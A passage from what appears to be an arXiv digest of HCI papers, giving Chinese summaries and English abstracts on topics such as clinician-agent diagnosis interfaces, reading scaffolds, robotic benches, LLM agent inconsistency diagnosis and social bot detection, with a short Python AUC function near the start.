Abstract:Instructional alignment, the match between intended cognition and enacted activity, is central to effective instruction but hard to operationalize at scale. We examine alignment in cybersecurity simulations using multimodal traces from 23 teams (76 students) across five exercise sessions. Study 1 codes objectives and team emails with Bloom’s taxonomy and models the completion of key exercise tasks with generalized linear mixed models. Alignment, defined as the discrepancy between required and enacted Bloom levels, predicts success, whereas the Bloom category alone does not predict success once discrepancy is considered. Study 2 compares predictive feature families using grouped cross-validation and l1-regularized logistic regression. Text embeddings and log features outperform Bloom-only models (AUC 0.74 and 0.71 vs. 0.55), and their combination performs best (Test AUC 0.80), with Bloom frequencies adding little. Overall, the work offers a measure of alignment for simulations and shows that multimodal traces best forecast performance, while alignment provides interpretable diagnostic insight.
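文中用 AUC 比较各特征组合的预测能力。AUC 可按 Mann-Whitney 成对比较的等价定义直接计算:随机取一正一负样本,正样本得分更高的概率(以下为该指标的通用实现,并非论文代码):

```python
def auc(labels, scores):
    """ROC 曲线下面积的成对比较(Mann-Whitney)形式:
    统计所有 (正, 负) 样本对中正样本得分更高的比例,打平记 0.5。"""
    pos = [s for y, s in zip(labels, scores) if y == 1]
    neg = [s for y, s in zip(labels, scores) if y == 0]
    if not pos or not neg:
        raise ValueError("need both classes")
    wins = sum((p > n) + 0.5 * (p == n) for p in pos for n in neg)
    return wins / (len(pos) * len(neg))
```

按此定义,0.55 接近随机猜测(0.5),而 0.80 意味着随机抽取的"成功任务"有八成概率比"失败任务"得到更高的预测分,直观解释了文中多模态特征组合的优势。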
[HC-4] Within the MDT Room: Situated in Multidisciplinary Team-Grounded Agent Debate for Clinical Diagnosis
【速读】:该论文旨在解决罕见病诊断中因症状异质性、临床认知有限及跨学科证据碎片化导致的挑战,以及现有基于大语言模型(Large Language Model, LLM)的多智能体系统在人机协同中的局限性问题。当前系统虽能模拟多学科团队讨论生成诊断假设,但缺乏对医生有效干预的支持,常以线性、无结构的对话日志呈现结果,使临床医生难以快速理解推理过程、及时介入或引导智能体决策。解决方案的关键在于提出MDTRoom——一个交互式可视化工作空间,将多智能体讨论转化为结构化的可检查对象,显式呈现患者数据、证据溯源、假设演化和智能体间冲突等要素,并通过相互关联的视觉元素支持医生高效审查、适时干预与引导推理过程,从而显著提升医-智协同效率与诊断质量。
链接: https://arxiv.org/abs/2603.28393
作者: Peng Kuai,Yukun Yang,Shaolun Ruan,Junchi Xu,Yanjie Zhang,Lin Zhang,Min Zhu,Rui Sheng
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Rare disease diagnosis is inherently challenging due to heterogeneous symptoms, limited clinical familiarity, and fragmented evidence across specialties. Recent large language model (LLM)-based agentic systems have shown promise by simulating multidisciplinary team discussions to generate and evaluate diagnostic hypotheses. However, fully automated diagnosis remains unrealistic, and existing human-in-the-loop approaches provide limited support for effective clinician-agent collaboration. In practice, clinicians are often presented with final diagnostic outputs and lengthy, unstructured agent discussion logs, making it difficult to inspect reasoning, intervene in a timely manner, or guide agent deliberation effectively. To address these challenges, we developed MDTRoom, an interactive system that transforms multi-agent discussions from linear transcripts into a structured, inspectable workspace. The system externalizes patient data, evidence provenance, hypothesis evolution, and inter-agent conflicts as interconnected visual objects, enabling clinicians to efficiently examine, intervene in, and guide agent reasoning. Our evaluation demonstrates the effectiveness of MDTRoom in supporting clinician-agent collaboration.
[HC-5] Tailoring AI-Driven Reading Scaffolds to the Distinct Needs of Neurodiverse Learners
【速读】:该论文旨在解决神经多样性学习者在阅读过程中对支持性辅助工具(scaffolding)的需求与潜在认知过载之间的矛盾问题,即如何在不增加注意力和工作记忆负担的前提下提升阅读理解能力。其解决方案的关键在于采用“条件性支架”(contingent scaffolding)视角,通过对比结构性(如句子分段)与语义性(如图标、关键词标签)两类支架的组合效果,发现不存在普适最优的单一支架形式,而是需根据个体差异动态调整支架类型与强度,从而实现个性化支持,并为未来人机协同调控(human-AI co-regulation)在包容性阅读环境中的设计提供依据。
链接: https://arxiv.org/abs/2603.28370
作者: Soufiane Jhilal,Eleonora Pasqua,Caterina Marchesi,Riccardo Corradi,Martina Galletti
机构: 未知
类目: Computation and Language (cs.CL); Human-Computer Interaction (cs.HC)
备注: Accepted at AIED 2026
Abstract:Neurodiverse learners often require reading supports, yet increasing scaffold richness can sometimes overload attention and working memory rather than improve comprehension. Grounded in the Construction-Integration model and a contingent scaffolding perspective, we examine how structural versus semantic scaffolds shape comprehension and reading experience in a supervised inclusive context. Using an adapted reading interface, we compared four modalities: unmodified text, sentence-segmented text, segmented text with pictograms, and segmented text with pictograms plus keyword labels. In a within-subject pilot with 14 primary-school learners with special educational needs and disabilities, we measured reading comprehension using standardized questions and collected brief child- and therapist-reported experience measures alongside open-ended feedback. Results highlight heterogeneous responses as some learners showed patterns consistent with benefits from segmentation and pictograms, while others showed patterns consistent with increased coordination costs when visual scaffolds were introduced. Experience ratings showed limited differences between modalities, with some apparent effects linked to clinical complexity, particularly for perceived ease of understanding. Open-ended feedback of the learners frequently requested simpler wording and additional visual supports. These findings suggest that no single scaffold is universally optimal, reinforcing the need for calibrated, adjustable scaffolding and provide design implications for human-AI co-regulation in supervised inclusive reading contexts.
[HC-6] Proposing a Game Theory Approach to Explore Group Dynamics with Social Robot ICIP
【速读】:该论文试图解决的问题是:如何通过引入社交机器人(social robots)来促进群体成员之间的合作,尤其是在群体决策过程中机器人角色的社会影响尚未明确的背景下。解决方案的关键在于采用博弈论方法,利用公共品博弈(Public Good Game)构建一个简化且可控的社会情境,以系统评估机器人对人类合作行为的影响机制,从而为教育环境和工作场所中机器人辅助协作提供理论依据与实践路径。
链接: https://arxiv.org/abs/2603.28348
作者: Giulia Pusceddu
机构: 未知
类目: Robotics (cs.RO); Human-Computer Interaction (cs.HC)
备注: Honorable Mention at HRI Pioneers 2025. Peer-reviewed. this https URL
Abstract:Integrating social robots in our group-based society, beyond the technical challenges, requires considering the social group dynamics. Following the results from preliminary exploratory studies on the influence of social robots on group decisions, the proposed research investigates whether social robots can foster cooperation among group members. To achieve this, I propose a game theory approach, employing the Public Good Game to recreate a simplified and controlled social situation where the robot’s influence can be evaluated. Clarifying the role of robots in promoting collaboration among humans might have a significant impact in educational environments, enhancing student learning, as well as in workplace settings, where they could facilitate problem-solving and lead to shared solutions.
[HC-7] Animated Public Furniture as an Interaction Mediator: Engaging Passersby In-the-Wild with Robotic Benches
【速读】:该论文旨在解决如何通过动态交互式公共家具(如移动机器人长椅)来主动调节城市环境中行人的社会互动行为,从而提升人与建成环境之间的体验质量。其核心解决方案在于提出一个“可供性过渡模型”(Affordance Transition Model, ATM),该模型揭示了机器人家具在实际场景中可通过三种感知到的可供性——作为机器人激活参与、作为空间元素重新分配参与、以及作为基础设施稳定参与——实现对行人互动状态的主动引导与过渡,从而系统性地增强公共空间的社会活跃度与用户沉浸感。
链接: https://arxiv.org/abs/2603.28339
作者: Xinyan Yu,Marius Hoggenmueller,Xin Lu,Ozan Balci,Martin Tomitsch,Andrew Vande Moere,Alex Binh Vinh Duc Nguyen
机构: The University of Sydney(悉尼大学); KU Leuven(鲁汶大学); University of Technology Sydney(悉尼科技大学); University of Antwerp(安特卫普大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Urban HCI investigates how digital technologies shape human behaviour within the social, spatial, temporal dynamics of public space. Meanwhile, robotic furniture research demonstrates how the purposeful animation of mundane utilitarian elements can influence human behaviour in everyday contexts. Taken together, these strands highlight an untapped opportunity to investigate how animated public furniture could mediate social interaction in urban environments. In this paper, we present the design process and in-the-wild study of mobile robotic benches that reconfigure with a semi-outdoor public space. Our findings show that the gestural performance of the benches manifested three affordances perceived by passersby: they activated engagement as robots, redistributed engagement as spatial elements, and settled engagement as infrastructure. We propose an Affordance Transition Model (ATM) describing how robotic furniture could proactively facilitate transition between these affordances to engage passersby. Our study bridges robotic furniture and urban HCI to purposefully activate human experience with the built environment.
[HC-8] Users and Wizards in Conversations: How WoZ Interface Choices Define Human-Robot Interactions
【速读】:该论文旨在解决Wizard-of-Oz(WoZ)实验中接口设计对人机交互质量影响的问题,特别是从用户和操作者(wizard)双重视角评估不同界面如何塑造机器人感知与社交表现。其解决方案的关键在于对比三种具有不同对话输入输出限制的WoZ界面:受限感知图形用户界面(GUI)、无限制感知GUI以及虚拟现实(VR)远程存在界面。研究发现,VR界面通过提供沉浸式音视频流和操作者自发的非语言行为传递(如语音、注视和面部表情),显著提升了用户的机器人特征感知和社交临场感(social presence),并促进更连贯的交互节奏(减少沉默与错位),尽管对操作者要求更高。这表明,采用远程存在类接口可更真实地模拟未来机器人交互场景,为基于自然情境下言语与非言语行为数据的自动化系统开发提供有效路径。
链接: https://arxiv.org/abs/2603.28338
作者: Ekaterina Torubarova,Jura Miniota,Andre Pereira
机构: 未知
类目: Human-Computer Interaction (cs.HC); Robotics (cs.RO)
备注: Published in Robotics: Science and Systems (2025)
Abstract:In this paper, we investigated how the choice of a Wizard-of-Oz (WoZ) interface affects communication with a robot from both the user’s and the wizard’s perspective. In a conversational setting, we used three WoZ interfaces with varying levels of dialogue input and output restrictions: a) a restricted perception GUI that showed fixed-view video and ASR transcripts and let the wizard trigger pre-scripted utterances and gestures; b) an unrestricted perception GUI that added real-time audio from the participant and the robot; and c) a VR telepresence interface that streamed immersive stereo video and audio to the wizard and forwarded the wizard’s spontaneous speech, gaze and facial expressions to the robot. We found that the interaction mediated by the VR interface was preferred by users in terms of robot features and perceived social presence. For the wizards, the VR condition turned out to be the most demanding but elicited a higher social connection with the users. The VR interface also induced the most connected interaction in terms of inter-speaker gaps and overlaps, while the restricted GUI induced the least connected flow and the largest silences. Given these results, we argue for more WoZ studies using telepresence interfaces. These studies better reflect the robots of tomorrow and offer a promising path to automation based on naturalistic contextualized verbal and non-verbal behavioral data.
[HC-9] Fostering Design-Policy Collaboration through Contestation: An Adversarial Futuring Method
【速读】:该论文旨在解决新兴技术发展过程中技术设计与政策制定之间存在的社会技术张力(sociotechnical tensions),即二者在应对复杂社会影响时缺乏有效协同的问题。解决方案的关键在于提出“设计-政策对抗性未来推演”(Design-Policy Adversarial Futuring)这一基于情景的研讨会方法,通过结构化地呈现设计视角与政策视角之间的争议(contestation),促进跨领域协作;其核心机制包括揭示不断变化的损害形态、将抽象政策概念具象化为具体应用场景,并在保持政策推理现实性的前提下合理化极端设想,从而推动人机交互(HCI)与政策领域的实质性对话与合作。
链接: https://arxiv.org/abs/2603.28331
作者: Xinyan Yu,Marius Hoggenmueller,Tram Thi Minh Tran,Martin Tomitsch
机构: The University of Sydney (悉尼大学); University of Technology Sydney (悉尼科技大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Emerging technologies introduce sociotechnical tensions that call for closer collaboration between technology design and policy. In this work, we introduce Design-Policy Adversarial Futuring, a scenario-based workshop method that supports design-policy engagement by structuring contestation between design and policy perspectives. We report on a workshop conducted in the autonomous mobility domain with 12 HCI researchers, used to explore and demonstrate the method in practice. The workshop illustrates how the adversarial futuring method can surface shifting harms, translate policy abstractions into situated use, and legitimise extreme ideas while maintaining grounded policy reasoning. This work contributes a reusable, exploratory method for supporting HCI-policy collaboration through contestation, which can be adapted across emerging technological domains.
[HC-10] Designing AI for Real Users – Accessibility Gaps in Retail AI Front-End
【速读】:该论文旨在解决当前生成式 AI (Generative AI) 系统在用户界面设计中对不同能力用户群体(如视觉、听觉、运动、认知、言语及感官差异者,以及数字素养和交互规范存在年龄差异的用户)存在的隐性排斥问题。尽管许多AI前端系统被宣传为直观且包容,但其交互假设往往默认“理想用户的身体与心智状态”,从而在实际使用中造成边缘化。论文指出,此类问题并非源于技术限制,而是由商业、组织和采购环境中的结构性缺陷所致——其中无障碍设计极少作为合同义务。解决方案的关键在于引入“前端保障”(front-end assurance),即通过制度性机制确保AI系统的智能性和多模态特性能够真正适配多样化的现实用户需求,从而实现从技术伦理到实践落地的闭环治理。
链接: https://arxiv.org/abs/2603.28196
作者: Neha Puri,Tim Dixon
机构: 未知
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: Accepted at the Proceedings of the CHI 2026 Workshop: Ethics at the Front-End
Abstract:As AI becomes embedded in customer-facing systems, ethical scrutiny has largely focused on models, data, and governance. Far less attention has been paid to how AI is experienced through user-facing design. This commentary argues that many AI front-ends implicitly assume an ‘ideal user body and mind’, and that this becomes visible and ethically consequential when examined through the experiences of differently abled users. We explore this through retail AI front-ends for customer engagement - i.e., virtual assistants, virtual try-on systems, and hyper-personalised recommendations. Despite intuitive and inclusive framing, these systems embed interaction assumptions that marginalise users with vision, hearing, motor, cognitive, speech and sensory differences, as well as age-related variation in digital literacy and interaction norms. Drawing on practice-led insights, we argue that these failures persist not primarily due to technical limits, but due to the commercial, organisational, and procurement contexts in which AI front-ends are designed and deployed, where accessibility is rarely contractual. We propose front-end assurance as a practical complement to AI governance, aligning claims of intelligence and multimodality with the diversity of real users.
[HC-11] InconLens: Interactive Visual Diagnosis of Behavioral Inconsistencies in LLM-based Agentic Systems
【速读】:该论文旨在解决大语言模型(Large Language Model, LLM)驱动的智能体系统在多轮执行中因生成过程的随机性导致的行为不一致性问题,即相同输入下智能体可能在不同运行中表现各异,而现有调试与评估工具难以支持跨运行的行为对比分析。其解决方案的关键在于提出InconLens这一可视化分析系统,通过引入信息节点(information nodes)作为中间抽象,捕获多个执行路径中共有的语义里程碑,从而实现对智能体推理轨迹的语义对齐与跨运行比较,帮助开发者高效识别行为分歧点、发现潜在失败模式,并获得提升系统可靠性和稳定性的可操作洞察。
链接: https://arxiv.org/abs/2603.28106
作者: Shuo Yan,Xiaolin Wen,Shaolun Ruan,Yanjie Zhang,Jiaming Mi,Yushi Sun,Huamin Qu,Rui Sheng
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Large Language Model (LLM)-based agentic systems have shown growing promise in tackling complex, multi-step tasks through autonomous planning, reasoning, and interaction with external environments. However, the stochastic nature of LLM generation introduces intrinsic behavioral inconsistency: the same agent may succeed in one execution but fail in another under identical inputs. Diagnosing such inconsistencies remains a major challenge for developers, as agent execution logs are often lengthy, unstructured, and difficult to compare across runs. Existing debugging and evaluation tools primarily focus on inspecting single executions, offering limited support for understanding how and why agent behaviors diverge across repeated runs. To address this challenge, we introduce InconLens, a visual analytics system designed to support interactive diagnosis of LLM-based agentic systems with a particular focus on cross-run behavioral analysis. InconLens introduces information nodes as an intermediate abstraction that captures canonical informational milestones shared across executions, enabling semantic alignment and inspection of agent reasoning trajectories across multiple runs. We demonstrate the effectiveness of InconLens through a detailed case study and further validate its usability and analytical value via expert interviews. Our results show that InconLens enables developers to more efficiently identify divergence points, uncover latent failure modes, and gain actionable insights into improving the reliability and stability of agentic systems.
[HC-12] Synonymix: Unified Group Personas for Generative Simulations
【速读】:该论文旨在解决生成式AI(Generative AI)在模拟人类行为时存在的尺度局限问题,即当前方法仅聚焦于个体层面的个性化角色建模或宏观群体统计分析,缺乏对群体层次(meso-level)结构化表示的探索。其核心挑战在于如何在保留个体丰富经验的基础上,构建可查询、可交互的群体级抽象模型,从而支持更精细的行为分析与干预测试。解决方案的关键在于提出Synonymix框架,通过图结构抽象与合并技术,将多个个体生命故事(life story personas)整合为一个“unigraph”(统一图结构),形成兼具语义连贯性与隐私保护能力的群体表征;实验表明,该方法在通用社会调查(General Social Survey)任务中显著优于仅基于人口统计学的基线模型(p<0.001, r=0.59),且最大源贡献不超过13%,具备明确的隐私保障能力。
链接: https://arxiv.org/abs/2603.28066
作者: Huanxing Chen,Aditesh Kumar
机构: Stanford University (斯坦福大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注: 6 pages (excluding appendix), 3 figures, CHI’26 Extended Abstract (Poster)
Abstract:Generative agent simulations operate at two scales: individual personas for character interaction, and population models for collective behavior analysis and intervention testing. We propose a third scale: meso-level simulation - interaction with group-level representations that retain grounding in rich individual experience. To enable this, we present Synonymix, a pipeline that constructs a “unigraph” from multiple life story personas via graph-based abstraction and merging, producing a queryable collective representation that can be explored for sensemaking or sampled for synthetic persona generation. Evaluating synthetic agents on General Social Survey items, we demonstrate behavioral signal preservation beyond demographic baselines (p<0.001, r=0.59) with demonstrable privacy guarantee (max source contribution <13%). We invite discussion on interaction modalities enabled by meso-level simulations, and whether “high-fidelity” personas can ever capture the texture of lived experience.
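The privacy claim above bounds how much any single life story can dominate the merged unigraph. Assuming each merged node records which source personas contributed to it — a hypothetical representation for illustration, not the paper's actual data model — the bound can be checked with a few lines of pure Python:

```python
from collections import Counter

def max_source_contribution(node_sources):
    """Given, for each unigraph node, the list of source personas that
    contributed to it, return the largest fraction of all contributions
    attributable to any single source persona."""
    counts = Counter(src for sources in node_sources for src in sources)
    total = sum(counts.values())
    return max(counts.values()) / total

# Hypothetical unigraph: each inner list = contributing personas of one node.
nodes = [["p1", "p2"], ["p2", "p3"], ["p3", "p4"], ["p1", "p4"]]
print(max_source_contribution(nodes))  # → 0.25 (all personas contribute equally)
```

A merge step could reject or re-balance any unigraph for which this fraction exceeds the chosen threshold (13% in the paper's reported guarantee).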
[HC-13] CARLA-Air: Fly Drones Inside a CARLA World – A Unified Infrastructure for Air-Ground Embodied Intelligence
【速读】:该论文旨在解决当前仿真基础设施在低空经济(low-altitude economies)、具身智能(embodied intelligence)与空地协同系统(air-ground cooperative systems)研究中面临的多模态、跨域一致性建模难题。现有开源平台存在领域割裂问题:驾驶仿真缺乏空中动力学,而多旋翼飞行仿真缺少真实地面场景;基于桥接的联合仿真虽可整合但引入同步开销且无法保证严格时空一致性。其解决方案的关键在于提出CARLA-Air——一个基于Unreal Engine单进程统一实现高保真城市驾驶与物理精确多旋翼飞行的开放框架,通过共享物理tick和渲染管线,在同一环境中同步支持最多18种传感器模态,同时保留CARLA与AirSim原生Python API及ROS 2接口,实现零修改代码复用,并支持自定义机器人平台扩展,从而为跨空地协同的具身智能任务提供统一、一致、可扩展的仿真基础。
链接: https://arxiv.org/abs/2603.28032
作者: Tianle Zeng,Hanxuan Chen,Yanci Wen,Hong Zhang
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Human-Computer Interaction (cs.HC)
备注: Prebuilt binaries, project page, full source code, and community discussion group are all available at: this https URL
Abstract:The convergence of low-altitude economies, embodied intelligence, and air-ground cooperative systems creates growing demand for simulation infrastructure capable of jointly modeling aerial and ground agents within a single physically coherent environment. Existing open-source platforms remain domain-segregated: driving simulators lack aerial dynamics, while multirotor simulators lack realistic ground scenes. Bridge-based co-simulation introduces synchronization overhead and cannot guarantee strict spatial-temporal consistency. We present CARLA-Air, an open-source infrastructure that unifies high-fidelity urban driving and physics-accurate multirotor flight within a single Unreal Engine process. The platform preserves both CARLA and AirSim native Python APIs and ROS 2 interfaces, enabling zero-modification code reuse. Within a shared physics tick and rendering pipeline, CARLA-Air delivers photorealistic environments with rule-compliant traffic, socially-aware pedestrians, and aerodynamically consistent UAV dynamics, synchronously capturing up to 18 sensor modalities across all platforms at each tick. The platform supports representative air-ground embodied intelligence workloads spanning cooperation, embodied navigation and vision-language action, multi-modal perception and dataset construction, and reinforcement-learning-based policy training. An extensible asset pipeline allows integration of custom robot platforms into the shared world. By inheriting AirSim’s aerial capabilities – whose upstream development has been archived – CARLA-Air ensures this widely adopted flight stack continues to evolve within a modern infrastructure. 
Released with prebuilt binaries and full source: this https URL
[HC-14] Filipino Students Willingness to Use AI for Mental Health Support: A Path Analysis of Behavioral Emotional and Contextual Factors
【速读】:该论文旨在解决菲律宾学生在心理健康支持中对人工智能(Artificial Intelligence, AI)工具使用意愿的影响因素问题。研究发现,行为习惯是影响使用意愿的最强因素,其次是情感舒适度、情绪收益、促进条件和感知有用性;关键解决方案在于通过AI素养教育、共情设计和伦理政策,构建情感安全环境并培养日常使用习惯,从而推动负责任且符合文化敏感性的AI在学生心理健康服务中的应用。
链接: https://arxiv.org/abs/2603.27994
作者: John Paul P. Miranda,Rhiziel P. Manalese,Ivan G. Liwanag,Rodel T. Alimurong,Alvin B. Roque
机构: 未知
类目: Human-Computer Interaction (cs.HC); Computers and Society (cs.CY)
备注: 24 pages, 5 figures, 1 table, book chapter
Abstract:This study examined how behavioral, emotional, and contextual factors influence Filipino students’ willingness to use artificial intelligence (AI) for mental health support. Results showed that habit had the strongest effect on willingness, followed by comfort, emotional benefit, facilitating conditions, and perceived usefulness. Students who used AI tools regularly felt more confident and open to relying on them for emotional support. Empathy, privacy, and accessibility also increased comfort and trust in AI systems. The findings highlight that emotional safety and routine use are essential in promoting willingness. The study recommends AI literacy programs, empathic design, and ethical policies that support responsible and culturally sensitive use of AI for student mental health care.
[HC-15] ViviDoc: Generating Interactive Documents through Human-Agent Collaboration
【速读】:该论文旨在解决交互式文档(Interactive Document)生成成本高、难以控制的问题,即传统方法需同时具备领域知识和网页开发技能,而直接使用大语言模型(Large Language Model, LLM)生成时又缺乏可控性。解决方案的关键在于提出ViviDoc,一个基于多智能体流水线(Planner、Styler、Executor、Evaluator)的系统,并引入三个层级的人类控制机制:(1)文档规范(Document Specification, DocSpec)结合SRTC交互规范(State, Render, Transition, Constraint)实现结构化规划;(2)内容感知的风格调色板(Style Palette)支持写作风格与交互行为的定制;(3)基于聊天的迭代编辑功能用于精细调整。该方案显著提升了生成内容的丰富度与交互质量,在自动化评估和用户研究中均表现出优越性能。
链接: https://arxiv.org/abs/2603.27991
作者: Yinghao Tang,Yupeng Xie,Yingchaojie Feng,Tingfeng Lan,Jiale Lao,Yue Cheng,Wei Chen
机构: State Key Lab of CADCG, Zhejiang University (浙江大学CADCG国家重点实验室); HKUST(GZ) (香港科技大学(广州)); National University of Singapore (新加坡国立大学); University of Virginia (弗吉尼亚大学); Cornell University (康奈尔大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI)
备注:
Abstract:Interactive documents help readers engage with complex ideas through dynamic visualization, interactive animations, and exploratory interfaces. However, creating such documents remains costly, as it requires both domain expertise and web development skills. Recent Large Language Model (LLM)-based agents can automate content creation, but directly applying them to interactive document generation often produces outputs that are difficult to control. To address this, we present ViviDoc, to the best of our knowledge the first work to systematically address interactive document generation. ViviDoc introduces a multi-agent pipeline (Planner, Styler, Executor, Evaluator). To make the generation process controllable, we provide three levels of human control: (1) the Document Specification (DocSpec) with SRTC Interaction Specifications (State, Render, Transition, Constraint) for structured planning, (2) a content-aware Style Palette for customizing writing and interaction styles, and (3) chat-based editing for iterative refinement. We also construct ViviBench, a benchmark of 101 topics derived from real-world interactive documents across 11 domains, along with a taxonomy of 8 interaction types and a 4-dimensional automated evaluation framework validated against human ratings (Pearson r > 0.84). Experiments show that ViviDoc achieves the highest content richness and interaction quality in both automated and human evaluation. A 12-person user study confirms that the system is easy to use, provides effective control over the generation process, and produces documents that satisfy users.
[HC-16] From Passersby to Placemaking: Designing Autonomous Vehicle-Pedestrian Encounters for an Urban Shared Space
【速读】:该论文旨在解决自动驾驶汽车(AV)在城市共享空间中对行人体验和场所营造(placemaking)的潜在负面影响问题,即AV可能削弱以人为核心的空间氛围。解决方案的关键在于设计基于场所的外部人机交互界面(eHMI),通过增强传统意图表达eHMI的功能,并实现内容与物理形态上与城市共享空间的高度融合,从而提升行人感知的安全性、愉悦感及共存意图,进而支持以人为本的场所营造目标。
链接: https://arxiv.org/abs/2603.27933
作者: Yiyuan Wang,Martin Tomitsch,Marius Hoggenmüller,Senuri Wijenayake,Wai Yan,Luke Hespanhol
机构: The University of Sydney(悉尼大学); The University of Technology Sydney(悉尼科技大学); The Royal Melbourne Institute of Technology(皇家墨尔本理工大学)
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Autonomous vehicles (AVs) tend to disrupt the atmosphere and pedestrian experience in urban shared spaces, undermining the focus of these spaces on people and placemaking. We investigate how external human-machine interfaces (eHMIs) supporting AV-pedestrian interaction can be extended to consider the characteristics of an urban shared space. Inspired by urban HCI, we devised three place-based eHMI designs that (i) enhance a conventional intent eHMI and (ii) exhibit content and physical integration with the space. In an evaluation study, 25 participants experienced the eHMIs in an immersive simulation of the space via virtual reality and shared their impressions through think-aloud, interviews, and questionnaires. Results showed that the place-based eHMIs had a notable effect on influencing the perception of AV interaction, including aspects like visual aesthetics and sense of reassurance, and on fostering a sense of place, such as social interactivity and the intentionality to coexist. In measuring qualities of pedestrian experience, we found that perceived safety significantly correlated with user experience and affect, including the attractiveness of eHMIs and feelings of pleasantness. The paper opens the avenue for exploring how eHMIs may contribute to the placemaking goals of pedestrian-centric spaces and improve the experience of people encountering AVs within these environments.
[HC-17] MGDIL: Multi-Granularity Summarization and Domain-Invariant Learning for Cross-Domain Social Bot Detection
【速读】:该论文旨在解决社交机器人(Social Bots)在在线平台中通过复杂伪装渗透所带来的信息生态威胁问题,特别是现有检测方法在模态缺失、输入不完整或训练测试分布不一致(out-of-distribution, OOD)场景下表现脆弱的问题。其解决方案的关键在于提出一个统一框架 Multi Granularity Summarization and Domain Invariant Learning (MGDIL),该框架首先利用大语言模型(LLM)进行多粒度摘要,将异构信号转化为统一的文本表示;随后构建协同优化机制,融合任务导向的LLM指令微调与域不变表征学习:前者增强模型对隐含语义线索和伪装模式的捕捉能力,后者通过域对抗学习与跨域对比学习联合实现跨数据集和时间维度的分布对齐,从而学习稳定且判别性强的域不变特征,显著提升跨域社交机器人检测的鲁棒性。
链接: https://arxiv.org/abs/2603.27928
作者: Boyu Qiao,Yunman Chen,Kun Li,Wei Zhou,Songlin Hu,Yunya Song
机构: Institute of Information Engineering, Chinese Academy of Sciences (中国科学院信息工程研究所); School of Cyber Security, University of Chinese Academy of Sciences (中国科学院大学网络空间安全学院); Hong Kong University of Science and Technology (香港科技大学)
类目: Social and Information Networks (cs.SI); Human-Computer Interaction (cs.HC)
备注:
Abstract:Social bots increasingly infiltrate online platforms through sophisticated disguises, threatening healthy information ecosystems. Existing detection methods often rely on modality-specific cues or local contextual features, making them brittle when modalities are missing or inputs are incomplete. Moreover, most approaches assume similar train-test distributions, which limits their robustness to out-of-distribution (OOD) samples and emerging bot types. To address these challenges, we propose Multi-Granularity Summarization and Domain-Invariant Learning (MGDIL), a unified framework for robust social bot detection under domain shift. MGDIL first transforms heterogeneous signals into unified textual representations through LLM-based multi-granularity summarization. Building on these representations, we design a collaborative optimization framework that integrates task-oriented LLM instruction tuning with domain-invariant representation learning. Specifically, task-oriented instruction tuning enhances the LLM’s ability to capture subtle semantic cues and implicit camouflage patterns, while domain-adversarial learning and cross-domain contrastive learning are jointly employed to mitigate distribution shifts across datasets and time periods. Through this joint optimization, MGDIL learns stable and discriminative domain-invariant features, improving cross-domain social bot detection through better distribution alignment, stronger intra-class compactness, and clearer inter-class separation.
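The cross-domain contrastive objective mentioned above pulls same-class representations together across domains while pushing other samples apart. An InfoNCE-style loss of that kind can be sketched in pure Python — this is an illustration of the general technique, not MGDIL's actual loss; the embeddings, temperature, and encoder are all assumed:

```python
import math

def cosine(u, v):
    # Cosine similarity between two embedding vectors.
    dot = sum(a * b for a, b in zip(u, v))
    nu = math.sqrt(sum(a * a for a in u))
    nv = math.sqrt(sum(b * b for b in v))
    return dot / (nu * nv)

def contrastive_loss(anchor, positive, negatives, temperature=0.1):
    """InfoNCE: negative log of the softmax probability assigned to the
    positive (same class, other domain) against in-batch negatives."""
    sims = [cosine(anchor, positive)] + [cosine(anchor, n) for n in negatives]
    exps = [math.exp(s / temperature) for s in sims]
    return -math.log(exps[0] / sum(exps))

# Toy embeddings: the anchor is close to its cross-domain positive,
# so the loss is small; swapping in a far-away positive inflates it.
anchor = [1.0, 0.1]
positive = [0.9, 0.2]
negatives = [[-1.0, 0.3], [0.0, 1.0]]
print(round(contrastive_loss(anchor, positive, negatives), 4))  # small value
```

Minimizing this loss over pairs drawn from different datasets or time periods is one standard way to encourage the intra-class compactness and inter-class separation the abstract describes.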
[HC-18] Comparing Design Metaphors and User-Driven Metaphors for Interaction Design
【速读】:该论文试图解决的问题是:设计者所设想的用户体验隐喻(design metaphors)是否与用户实际感知的体验隐喻(user metaphors)一致,以及这种一致性如何影响用户体验的评估与优化。解决方案的关键在于构建一个系统性的比较框架,通过收集554个用户隐喻及其匹配度评分,并结合平台自上线以来的历史网络数据识别出21个设计隐喻,从而揭示设计与用户隐喻之间的不匹配现象,并指出即使两者一致时也未必具有普遍共鸣,进而为优化用户界面和交互设计提供实证依据。
链接: https://arxiv.org/abs/2603.27908
作者: Beleicia Bullock,James A. Landay,Michael S. Bernstein
机构: Stanford University (斯坦福大学)
类目: Human-Computer Interaction (cs.HC)
备注: Accepted at CHI 2026
Abstract:Metaphors enable designers to communicate their ideal user experience for platforms. Yet, we often do not know if these design metaphors match users’ actual experiences. In this work, we compare design and user metaphors across three different platforms: ChatGPT, Twitter, and YouTube. We build on prior methods to elicit 554 user metaphors, as well as ratings on how well each metaphor describes users’ experiences. We then identify 21 design metaphors by analyzing each platform’s historical web presence since their launch date. We find that design metaphors often do not match the metaphors that users use to describe their experiences. Even when design and user metaphors do match, the metaphors do not always resonate universally. Through these findings, we highlight how comparing design and user metaphors can help to evaluate and refine metaphors for user experience.
[HC-19] Visualization use in qualitative research reports: Evolving media types and competing epistemologies
